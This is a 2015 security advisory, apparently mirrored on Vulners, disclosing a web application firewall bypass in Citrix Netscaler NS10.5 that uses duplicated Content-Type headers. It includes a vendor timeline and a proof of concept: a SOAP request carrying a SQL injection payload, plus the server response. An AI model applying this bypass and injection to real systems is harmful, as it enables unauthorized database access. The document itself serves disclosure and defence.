Vulners
Lucene search
Citrix Netscaler NS10.5 - WAF Bypass Via HTTP Header Pollution Vulnerability
# Exploit Title: [Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution]
# Date: [Mar 13, 2015]
# Exploit Author: [BGA Security]
# Vendor Homepage: [http://www.citrix.com/]
# Version: [NS10.5]
# Tested on: [NetScaler NS10.5: Build 50.9.nc,]
Document Title:
============
Citrix Netscaler NS10.5 WAF Bypass via HTTP Header Pollution
Release Date:
===========
12 Mar 2015
Product & Service Introduction:
========================
Citrix NetScaler AppFirewall is a comprehensive application security solution that blocks known and unknown attacks targeting web and web services applications.
Abstract Advisory Information:
=======================
BGA Security Team discovered an HTTP Header Pollution
vulnerability in Citrix Netscaler NS10.5 (other versions may be vulnerable)
Vulnerability Disclosure Timeline:
=========================
2 Feb 2015 Bug reported to the vendor.
4 Feb 2015 Vendor returned with a case ID.
5 Feb 2015 Detailed info/config given.
12 Feb 2015 Asked about the case.
16 Feb 2015 Vendor returned "investigating ..."
6 Mar 2015 Asked about the case.
6 Mar 2015 Vendor has validated the issue.
12 Mar 2015 There aren't any fix addressing the issue.
Discovery Status:
=============
Published
Affected Product(s):
===============
Citrix Systems, Inc.
Product: Citrix Netscaler NS10.5 (other versions may be vulnerable)
Exploitation Technique:
==================
Remote, Unauthenticated
Severity Level:
===========
High
Technical Details & Description:
========================
It is possible to bypass Netscaler WAF using a method which may be called HTTP Header Pollution. The setup:
An Apache web server with default configuration on Windows (XAMPP).
A SOAP web service which has written in PHP and vulnerable to SQL injection.
Netscaler WAF with SQL injection rules.
First request: â union select current_user,2# - Netscaler blocks it.
Second request: The same content and an additional HTTP header which is âContent-Type: application/octet-streamâ. - It bypasses the WAF but the web server misinterprets it.
Third request: The same content and two additional HTTP headers which are âContent-Type: application/octet-streamâ and âContent-Type: text/xmlâ in that order. The request is able to bypass the WAF and the web server runs it.
Proof of Concept (PoC):
==================
Proof of Concept
Request:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<string>â union select current_user, 2#</string>
</soapenv:Body>
</soapenv:Envelope>
Response:
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<soap:Body>
<return xsi:type=âxsd:stringâ> Name: [email protected] </return>
</soap:Body>
</soap:Envelope>
Solution Fix & Patch:
================
12 Mar 2015 There aren't any fix addressing the issue.
Security Risk:
==========
The risk of the vulnerability above estimated as high.
Credits & Authors:
==============
BGA Bilgi GĂźvenliÄi - Onur ALANBEL
# 0day.today [2018-02-15] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Mar 2015 00:00Current
7.1High risk
Vulners AI Score7.1